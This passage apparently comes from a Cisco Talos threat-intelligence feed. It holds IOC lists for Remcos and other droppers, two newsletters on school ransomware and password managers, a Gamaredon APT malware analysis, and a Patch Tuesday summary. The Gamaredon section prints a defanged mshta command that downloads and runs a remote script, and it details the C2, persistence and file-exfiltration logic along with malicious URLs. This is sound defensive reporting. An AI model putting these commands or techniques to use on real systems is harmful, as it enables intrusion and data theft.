<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uejoeofv
1
<HKCU>\SOFTWARE\FMOPLQAL
Value Name: iqmwiqfj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wjrmnejf
1
<HKCU>\SOFTWARE\RKDPGLPX
Value Name: qmjertge
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mbmgmhmo
1
Mutexes Occurrences
aaAdministrator 15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
141[.]105[.]121[.]139 13
74[.]221[.]221[.]58 10
91[.]109[.]2[.]132 9
101[.]255[.]36[.]171 8
58[.]83[.]159[.]94 8
93[.]189[.]95[.]148 7
94[.]199[.]242[.]85 6
82[.]165[.]152[.]226 4
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 15

File Hashes

09650f5a6dbe38fc54c1d17e05955612e37e9268d3d821726fad65e5d13a127e 17b2f61b057168ed4414a71ec6c4f9cbaa78c96cfec6bd6330e7f8c298c715d5 235be690210e2d9c368f9028e47572dcc120b7f597877573af43ecaeb70e615f 2e61d7e17915a3359a01fd959b4383fdd2441b8544d457bb185fa2509e699d41 36f8895998b854c4276c0b2318baa41c947ea64f5bcc6666f634111ea62b6505 4bbaeba54a1b65e90b4d24714a45dbe37ec407364097a8c889f9f61d679e2fcd 51324e089d7b1ee9cf85837c719d993cea5dd928cc1e932aa2f17d3e758509e6 535a4f9cef7aef421ad38986f14de66251e72aba2dea5dd6ca666ab38f10f7db 55d37fae592c2d00bef0ff48e15dbe52f68edcd098c679233fd61d319d32c64b 5f050eaf9f0f3b9c2cddc84bbcf53115932932da4151f719169e5d2c8e672764 6cc11bd407b5882290b839eedae377cd63ec3a4d3cbc87f8686dd63e233922da 72b3b8bf3ce9c0bb3831e453fcfdcdf37e44e183eb1cdba383d5196e90829935 7cb0202a99a14882e1108c5c7deb738289873b99dec43172bbe6ee39136bd9fe 9ef1750fce26d1ef5908b3d7f7304a54edee5207282ffedcf525a8c714bb5ac8 d699fe8f3c9f2925101e85dfacaca00550fe2a7cf4ef22aff827bc88900f5a18

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9969014-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\ZANGARMARSH-228I7H 13
<HKCU>\SOFTWARE\ZANGARMARSH-228I7H
Value Name: EXEpath
13
Mutexes Occurrences
Remcos_Mutex_Inj 13
Zangarmarsh-228I7H 13
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ezpz1[.]xyz 13
Files and or directories created Occurrences
%SystemRoot%\win.ini 13
%APPDATA%\csrss.exe 13
%System32%\Tasks\csrss 13
%APPDATA%\javacache 13
%APPDATA%\javacache\logs.dat 13

File Hashes

02d30b6a94180708d4d525914a917cd9370190926e549fada8d93b4fd033e906 0c335742c2a239dddbe7467946c481609d1840dca5b67a80ea071d4a593b4ad0 216c429a096cbc58d595d015dd82f9c2be8a89af1d295e511a9ae8431c889710 4a01a7d09fe699b3d699463a6f76b445e0a07dc0d8360ba4fca4ddcda7a2af66 4a86b0a93ce30688176f4f745c52cec56cd023a924c58f8a27d36570871ab580 5af743dffb813faf071cf185f39c3d258864556a154cfa12ac1b8a56607bd2ce 608bd3bada966b94ecff736b0811278b7db6cef97c0133e296a5d8bad2ac725d 7ac6edfc10a8361d20fee7f561d4fce8b3ea0e963cfc44c0421ca0fd8501c851 b4c77021bc5641683caa3280fe115fea383141b5722f215e6dcb4ad2913cc02f b4e9902d2d44051e6620b458c43514e552df4c8f5a6aebdfd5363b3ac9e344a0 ceec2d534fe22ef53ae86302717458922993cccb16a5cfbabfb40d1956ee2415 f4a212b3bdc04c7be624a5955e43acf7f836dc9a14852d2fddda48095c017e6b ff804004e7082fcf4802beb7d8b4d4b03867de1b746af1021a703767c2728c4b

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Sept. 15, 2022) — Teachers have to be IT admins now, too

15 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Public schools in the United States already rely on our teachers for so much — they have to be educators, occasional parental figures, nurses, safety officers, law enforcement and much more. Slowly, they’re having to add “IT admin” to their list of roles. 

Educational institutions have increasingly become a target for ransomware attacks, an issue already highlighted this year by a major cyber attack on the combined Los Angeles school district in California that schools are still recovering from. 

Teachers there reported that during the week of the attack, they couldn’t enter attendance, lost lesson plans and presentations, and had to scrap homework plans. Technology has become ever-present in classrooms, so any minimal disruption in a school’s network or software can throw pretty much everything off. 

The last thing teachers need to worry about now is defending against a well-funded threat actor who may live thousands of miles away — but we’re not making it easy on them. 

I asked my mom about this, who is a paraeducator for kindergarten students, and she told me each of her students (keep in mind these are mostly 5- and 6-year-olds) has their own Chromebooks that they bring to and from home and use for homework assignments. The elementary school she works at has more than 500 students enrolled across six grades, and yet there’s only one person for the whole school who acts as their overall IT and network administrator. That’s one person to manage 500-plus laptops and even more devices like iPads and smartboards as you get into the older grades.  Many working adults still need to be educated about the dangers of cyber attacks or how to spot a spam text, how can we have the same expectations from kindergarteners?  

I’m not saying this is a simple issue to fix — it would cost millions of dollars to invest in security infrastructure at schools across the U.S. and hire the necessary staff to manage these devices. But I do wonder if it’s a bridge too far for the burden we’re already placing on teachers

Many of my friends who are educators are great teachers but would be far from computer experts, and I’m confident they’ve never thought about how secure the passwords that their students need to log into their laptops are.  

The FBI released a warning last week that the Vice Society ransomware group has increasingly been targeting schools across the U.S. and expects those attacks to continue as the school year ramps up. In the advisory, they said, “School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable.” If that’s the case, what happens if one of these underfunded districts is hit by a cyber attack? Rather than spending the year trying to beef up their security or implement new policies, they’ll instead just have to use up all their time and resources recovering from the attack and returning to square one. 

The teachers, IT admins and school leaders who are already stretched too thin will only be stretched further in the event of a cyber attack. So, before we start investing more money into getting technology into students’ hands in the classroom, it may be worth considering how those devices are meant to be protected and who will oversee protecting them. 
  

The one big thing 


Continuing our research into the well-known Lazarus Group, we have new details on a malware campaign with three different trojans targeting energy providers in the U.S., Canada and Japan. The newest malware is MagicRAT, which is deployed alongside two other RATs the Lazarus Group is known for. All three malware tools are being delivered via a targeted campaign that starts with the exploitation of the Log4j vulnerability in VMware Horizon. 

Why do I care? 

As we outlined in the newsletter last week, anything the Lazarus Group does is not to be taken lightly. And it’s particularly notable since they are targeting energy suppliers, highlighting the dangers that critical infrastructure faces from state-sponsored threat actors. Our research also shows the Lazarus Group is continually updating its malware and finding new ways to avoid detection.  

So now what? 

We’ve said this a thousand times already, but patch for Log4j in all software if you haven’t already since this is the primary infection method used in this campaign. Talos also released several new solutions for Cisco Secure to detect and prevent the malware used in these attacks.  

 

Top security headlines from the week


Twitter’s former head of security warned Congress about several potentially dangerous security practices at the social media giant. Peiter “Mudge” Zatko, one of the first “hackers” to enter mainstream culture, said in testimony that about 50 percent of Twitter’s employees could have access to sensitive user information, something he says he tried to prevent during his time at the company but was stopped. Zatko went as far to directly tell U.S. Senators that their personal data could be at risk because of these practices, adding that the company is “misleading the public, lawmakers, regulators, and even its own board of directors.” The testimony came under additional scrutiny because of its potential influence on the ongoing battle regarding Elon Musk’s failed offer to buy Twitter. (Vox, Politico

Montenegro’s government continues to grapple with a massive cyber attack, forcing many services offline at government offices and putting the country’s essential infrastructure, including banking, water and electrical power systems at risk. Government officials stated that the attack resembles others from well-known Russian state-sponsored actors. The FBI even deployed a special cybersecurity team to the country to help with the recovery and remediation process. The Cuba ransomware group claimed responsibility for the attack, going as far as to say they created a special malware just for this campaign. Recent cyber attacks against NATO nations like Montenegro and Albania have raised questions around NATO’s Article 5 could be triggered over offensive cyber attacks. (Associated Press, NPR

Apple released security updates for its mobile and desktop operating systems this week to patch zero-day vulnerabilities that attackers have actively exploited in the wild. CVE-2022-32917, according to Apple, could allow an attacker to execute arbitrary code with kernel privileges. This is the eighth zero-day vulnerability Apple disclosed this year. When updating iOS, users can upgrade to iOS 16, which also comes with several new security features. The new operating system includes a centralized privacy dashboard, safety checks for users who could be at risk of having their devices infected with spyware, and password-free logins on some sites. (9to5Mac, New York Times Wirecutter


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: a087b2e6ec57b08c0d0750c60f96a74c    
Typical Filename: AAct.exe    
Claimed Product: N/A      
Detection Name: PUA.Win.Tool.Kmsauto::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 

MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

Gamaredon APT targets Ukrainian government agencies in new campaign

15 September 2022 at 12:02

By Asheer Malhotra and Guilherme Venere.

  • Cisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT that infects Ukrainian users with information-stealing malware.
  • The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine.
  • LNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase.
  • We discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and deploy additional payloads as directed by the attackers.

Cisco Talos discovered Gamaredon APT activity targeting users in Ukraine with malicious LNK files distributed in RAR archives. The campaign, part of an ongoing espionage operation observed as recently as August 2022, aims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain. The infostealer is a dual-purpose malware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint.



The adversary uses phishing emails to deliver Microsoft Office documents containing remote templates with malicious VBScript macros. These macros download and open RAR archives containing LNK files that subsequently download and activate the next-stage payload on the infected endpoint. We observed considerable overlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this campaign and those used in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA) recently attributed to Gamaredon.

We also observed intrusion attempts against several Ukrainian entities. Based on these observations and Gamaredon's operational history of almost exclusively targeting Ukraine, we assess that this latest campaign is almost certainly directly targeting entities based in Ukraine.



Attack Chain

Initial Access


Gamaredon APT actors likely gained initial footholds into targeted networks through malicious Microsoft Office documents distributed via email. This is consistent with spear-phishing techniques common to this APT.

Malicious VBS macros concealed within remote templates execute when the user opens the document. The macros download RAR archives containing LNK files. The naming convention of the RAR archives in this campaign follows a similar pattern:

  • 31.07.2022.rar
  • 04.08.2022.rar
  • 10.08.2022.rar


These compressed archives usually contain just the LNK file. The LNK files and Microsoft Office document names contain references pertinent to the Russian invasion of Ukraine:


Execution


Once opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to execute a malicious PowerShell script:

mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f

Gamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP addresses inside the Ukrainian address space.

This PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from the victim and reports back to a remote server. This script also allows the remote server to send a PowerShell command or binary blob containing encrypted VBScript (VBS) code to be executed locally:

Second-stage PowerShell script that runs additional commands and payloads on the endpoint.

The instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the command and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is calculated based on the machine's volume serial number plus index parameters passed in the response blob. This method makes it difficult to decode the malicious content if an observer looking at the data doesn't have both parameters available.

The PowerShell script also repeatedly captures the current user's screen. This code uses the "System.Windows.Forms" object to capture a copy of the virtual desktop, including setups with multiple screens. The screen capture is executed nine times, but the resulting screenshot is always saved to "%TEMP%\test.png", which gets overwritten every time. The resulting image (PNG file) is then converted to a base64-encoded string, stored in a variable and the screenshot image file is removed from the disk.

The script then proceeds to upload the victim's information to the remote server. The following information is then collected and exfiltrated to a hardcoded C2 URL:

  • Computer name.
  • Volume serial number.
  • Base64-encoded screenshot.


Upon sending the system information, the server response is parsed to see if there are commands to be executed. The entire script runs up to four times, thus up to four different commands can be executed each time.

The code checks if the first character is an exclamation point ("!"). If so, the remainder of the response is expected to be a PowerShell code that is passed directly to the command IEX. The output of that command is then added to the variable "cmd" and sent back to the C2 server.

If the response starts with any other character, it is treated as an encrypted blob and passed to the decoder function, along with the volume serial number to be decoded and executed as VBScript.

Infection chain diagram.


Payloads

Yet another PowerShell script


One of the payloads served to the instrumentor script was PowerShell code used to set an environmental variable with PowerShell code in it and a Registry RUN key to run every time the user logs in.

PowerShell script setting up the RUN key to execute another PowerShell script stored in the environment variable.

There are two key components to this script:

  • The Get-IP function: This function queries a DNS lookup service for an attacker-specified domain and uses one of the returned IP addresses as the IP to download the next payloads.
  • Next-stage payload: The PowerShell script uses the IP address to construct a URL that serves the next-stage PowerShell script, which is subsequently stored in "$env:Include" and executed when the user logs in (via the HKCU\\Run key).


Persistence script fetching the remote location's IP.

The PowerShell code residing in the environment variable is meant to provide the attackers with continued access to the infected endpoint with the capability to deploy additional payloads as desired. A similar PowerShell script was described in CERT-UA's recent alert describing intrusions conducted by Gamaredon in the first half of 2022 using the GammaLoad and GammaSteel implants.

PowerShell script stored in the env variable.

This script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL constructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer name and volume serial number are used again in communications with the C2 server. The C2 server uses them to encode the next-stage payload subsequently served to the script.

If the response from the C2 starts with the string "http", the content is treated as the URL to download the final payload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is decoded using the XorBytes function.

PowerShell function used to decode payloads from C2 server.

The decrypted binary is then saved to the "%TEMP%" folder with a name consisting of a random string of numbers and the ".exe" file extension and is executed.

Alternatively, if the response from the C2 does not begin with the "http" string, the content is treated as a VBS and executed via a COM object.

Infostealer


One of the executables deployed by the attackers via the PowerShell script consisted of an information stealer that exfiltrates files of specific extensions from the infected endpoint: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb. This is a new infostealer that Gamaredon has not previously used in other campaigns. We suspect it may be a component of Gamaredon's "Giddome'' backdoor family, but we are unable to confirm that at this time.

The malicious binary keeps track of what has been exfiltrated in a file named "profiles_c.ini" in the "%USERPROFILE%\Appdata\Local" folder. The malware stores the MD5 hash of a string containing the filename, file size and modification date of the exfiltrated file.

Once started, the malware scans all attached storage devices looking for files with the aforementioned extensions. For each one, the malware makes a POST request with metadata about the exfiltrated file and its content.

POST data to exfiltrate files.

The parameter "p" contains metadata about the stolen file and the victim machine using the following format:

%u&&%s&&%s&&%s&&%s&&%s

Where the various parameters are:

<Hard_coded_value>&&<File_name>&&<File_Modification_Date_time>&&<FileSize>&&__&&<Computer_Name>&&<Username>&&<Victim_ID_randomly_generated_string_12_chars>&&<Volume Serial Number>

The raw content of the file comes after the metadata. The request is made to a random URI under the parent C2 domain. The implant generates a random 12-character string that acts as a subdomain for the C2 domain to send requests to:

E.g. <random_12_char_string>[.]celticso[.]ru

The implant will also search for the relevant file extensions in fixed and remote drives and specifically in the "C:\Users" folder. The implant enumerates all the files recursively in the directories on the system while avoiding enumeration of any folder containing the following strings in the path:

  • program files
  • program files (x86)
  • programdata
  • perflogs
  • prog
  • windows
  • appdata
  • local
  • roaming


Avoiding these folders is likely an attempt by the malware to avoid exfiltrating system files thereby focussing on user files of interest only.

For each file exfiltrated to the C2, the implant calculates the MD5 hash for the following information and stores it in the "%LocalAppData%\profiles_c.ini" file:

<file_path><File_size><File_modification_date_time>

The implant also steals files from removable drives connected to the infected endpoint. When the implant finds a removable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a randomly named folder in the %TEMP% directory and copies the original file from its original location to:

%Temp%\<randomly_named_folder>\connect\<removable_vol_serial_number>\<original file path>

For example, a user file found in a remote drive "E:" at path "E:\top_secret_docs\isengard.doc" will be copied to

"%temp%\randomly_named_folder\connect\<removable_vol_serial_number>\top_secret_docs\isengard.doc"

The contents of the folder in the temp directory are subsequently exfiltrated to the C2.

Deliver payloads


As with this actor's previous tools (e.g., the PS1 scripts), this binary also parses the server response and downloads additional payloads if requested. The response from the server consists of a flag indicating how the data should be treated:

Flag Payload Type Action
1 EXE Written to disk and executed.
2 VBS Written to disk and executed using wscript.exe.
Any other value Blob of data Written to a file on disk in the %TEMP% folder.

Code depicting the dropping of additional payloads.

There are other indications this malware may be present on the system, listed below:

  • A registry key is created under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name "Windows Task" for persistence
  • A mutex is created with the name Global\flashupdate_r


Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rules 60517-60539 are available for this threat.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.

IOCs

The IOC list is also available in Talos' Github repo here.

Malicious Documents

4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650


LNK Files

581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a
34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c

RAR Files

750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3

Infostealer

139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a

Malicious URLs

hxxp://a0698649.xsph[.]ru/barley/barley.xml
hxxp://a0700343.xsph[.]ru/new/preach.xml
hxxp://a0700462.xsph[.]ru/grow/guests.xml
hxxp://a0700462.xsph[.]ru/seek/lost.xml
hxxp://a0701919.xsph[.]ru/head/selling.xml
hxxp://a0701919.xsph[.]ru/predator/decimal.xml
hxxp://a0701919.xsph[.]ru/registry/prediction.xml
hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
hxxp://a0704093.xsph[.]ru/bass/grudge.xml
hxxp://a0705076.xsph[.]ru/ramzeses1.html
hxxp://a0705076.xsph[.]ru/regiment.txt
hxxp://a0705269.xsph[.]ru/bars/dearest.txt
hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
hxxp://a0705269.xsph[.]ru/prok/gur.html
hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
hxxp://a0705880.xsph[.]ru/band/sentiment.txt
hxxp://a0705880.xsph[.]ru/based/pre.txt
hxxp://a0705880.xsph[.]ru/selection/seedling.txt
hxxp://a0706248.xsph[.]ru/reject/headlong.txt
hxxp://a0707763.xsph[.]ru/decipher/prayer.txt

Additional Payload Drop Sites

hxxp://155.138.252[.]221/get.php
hxxp://45.77.237[.]252/get.php
hxxp://motoristo[.]ru/get.php
hxxp://heato[.]ru/index.php
hxxps://<random_string>.celticso[.]ru
162[.]33[.]178[.]129
kuckuduk[.]ru
pasamart[.]ru
celticso[.]ru




Microsoft Patch Tuesday for September 2022 — Snort rules and prominent vulnerabilities

13 September 2022 at 18:01

By Jon Munshaw and Asheer Malhotra. 

Microsoft released its monthly security update Tuesday, disclosing 64 vulnerabilities across the company’s hardware and software line, a sharp decline from the record number of issues Microsoft disclosed last month. 

September's security update features five critical vulnerabilities, 10 fewer than were included in last month’s Patch Tuesday. There are two moderate-severity vulnerabilities in this release and a low-security issue that’s already been patched as a part of a recent Google Chromium update. The remainder is considered “important.” 

The most serious vulnerability exists in several versions of Windows Server and Windows 10 that could allow an attacker to gain the ability to execute remote code (RCE) by sending a singular, specially crafted IPv6 packet to a Windows node where IPSec is enabled. CVE-2022-34718 only affects instances that have IPSec enabled. This vulnerability has a severity score of 9.8 out of 10 and is considered “more likely” to be exploited by Microsoft.

Microsoft disclosed one vulnerability that's being actively exploited in the wild — CVE-2022-37969. Microsoft's advisory states this vulnerability is already circulating in the wild and could allow an attacker to gain SYSTEM-level privileges by exploiting the Windows Common Log File System Driver. The adversary must first have the access to the targeted system and then run specific code, though no user interaction is required.

CVE-2022-34721 and CVE-2022-34722 also have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft. These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet.

Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700 exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner. 

Talos would also like to highlight five important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  

  • CVE-2022-37957 — Windows Kernel Elevation of Privilege Vulnerability 
  • CVE-2022-35803 — Windows Common Log File System Driver Elevation of Privilege Vulnerability 
  • CVE-2022-37954 — DirectX Graphics Kernel Elevation of Privilege Vulnerability 
  • CVE-2022-34725 — Windows ALPC Elevation of Privilege Vulnerability 
  • CVE-2022-34729 — Windows GDI Elevation of Privilege Vulnerability 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60546, 60547, 60549, 60550 and 60552 - 60554. We've also released Snort 3 rules 300266 - 300270.

Threat Source newsletter (Sept. 8, 2022) — Why there is no one-stop-shop solution for protecting passwords

8 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

It seems like there’s at least one major password breach every month — if not more. Most recently, there was an incident at Plex where all users had to reset their passwords.  

Many users pay for a password management service — which is something I’ve talked about a ton for Talos. But even those aren’t a one-size-fits-all solution. LastPass, one of the most popular password management services, recently suffered a breach of their own internal development environment, though as of right now, it doesn’t appear like any users’ primary passwords were compromised. 

This got me curious about how people prefer to manage their passwords, so I threw up a poll on our Twitter asking our readers how they managed their passwords. Paid password management services like LastPass and 1Password were the most popular response, followed by web browser-based managers like the ones Chrome and Safari offer. Several of the replies reminded me that there is another popular option I managed to neglect: open-source, operating system-independent solutions like KeePass. These are an appealing option because they’re free, while many of the other services I’ve mentioned charge a monthly or yearly fee, and they are cloud-based with strong encryption of the passwords they store, which is especially appealing for people jumping between operating systems or machines.  

These aren’t perfect solutions either, though, because many of these open-source solutions rely on unofficial ports to mobile operating systems to run on phones and they are a bit harder to parse for the “everyday” user. I would have more faith in my parents to download an app from 1Password and be able to figure it out than trying to use open-source software in their web browser, and they are the types of users most likely to fall victim to something like a phishing scam looking to break into these password managers.  

Web browser managers also aren’t as secure as other managed options and open the door to some serious consequences if a bad actor is to compromise your Google account login and then steals every other login you have.  

Unless users are ready to go back to the old-fashioned “write everything down in a notebook” solution, which also has its own set of problems, it seems like there is no perfect solution to keeping passwords safe. Instead, we need to learn from the benefits of each of these types of solutions to improve our password hygiene.  

We could all afford to mix up our passwords and use long strings with multiple types of characters like web browsers will encourage users to do. But we also need several layers of authentication to access our primary password like users need to do for paid software services.  

And even then, we still have a long way to go to encourage the “average” user and administrator about secure passwords. I recently learned that the Wi-Fi password at my wife’s health care-based office is a string of numbers so easy to guess I wouldn’t even feel bad for just typing it out here (but I won’t) — so maybe we need to clear that hurdle before we start trying to convert everyone to open-source password managers.  
  

The one big thing 


The Lazarus Group, a well-known state-sponsored threat actor, is adding to its arsenal with a new trojan Talos recently discovered called “MagicRAT.” Lazarus deployed MagicRAT in several instances after the successful exploitation of vulnerabilities in VMWare Horizon platforms. While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely.  

Why do I care? 

The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide. Lazarus is already a formidable threat actor that’s been incredibly active this year, including major cryptocurrency-related attacks aimed at generating money for the North Korean government and subverting international sanctions. Any new developments from this group are noteworthy for the security community at large. 

So now what? 

In the attacks we observed, Lazarus Group commonly exploited VMware vulnerabilities, so users should update any products they’re using as soon as possible. Additionally, we’ve released new Snort rules and OSqueries to detect any MagicRAT activities and block it before the attackers can get any further.  

 

Top security headlines from the week


The newest version of a well-known banking trojan on the Google Play store is masquerading as legitimate antivirus software and has already been installed on tens of thousands of devices. SharkBot, which was first discovered in February, infects Android users and then tries to initiate unwanted bank transfers by stealing users’ login information and intercepting SMS multi-factor authentication messages. The malware disguises itself as two apps: Mister Phone Cleaner, which has more than 50,000 downloads so far on the Google Play store, according to security researchers, and Kylhavy Mobile Security, which has been downloaded more than 10,000 times. Affected victims are in several different countries, including the U.S., Spain, Australia, Poland, Germany and Austria. (Bleeping Computer, Tech Monitor

Many students are heading back to school across the U.S., which also means an increased risk of cyber attacks for those schools. Threat actors traditionally try to target the education sector during this period when schools are more susceptible to an attack and more likely to pay any ransom payments. The massive, combined school district in Los Angeles, California was hit with a ransomware attack this week, forcing more than 600,000 students and staff to reset their passwords. It’s currently unclear what information if any, was stolen, but students could attend school as planned after the Labor Day weekend. The U.S. federal government even deployed cybersecurity-related agencies to the district to assist with the district’s recovery. (NPR, Washington Post

Local police departments have been using a little-known location-tracking service since 2018 that can allow them to track suspects’ locations without a warrant. The software, called Fog Reveal, allows the customer to use data harvested from others’ smartphones to track the location and other activities of suspects. Law enforcement has already used it to investigate several different types of crimes, including murder investigations and potential crimes surrounding the attempted insurrection on the U.S. Capitol on Jan. 6, 2021. However, the use of the software is rarely mentioned in court documents when used as part of a criminal trial. (Associated Press, Vice Motherboard


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: a087b2e6ec57b08c0d0750c60f96a74c    
Typical Filename: AAct.exe    
Claimed Product: N/A      
Detection Name: PUA.Win.Tool.Kmsauto::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 

MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

Lazarus and the tale of three RATs

8 September 2022 at 12:01



By Jung soo An, Asheer Malhotra and Vitor Ventura.

  • Cisco Talos has been tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by the United States government.
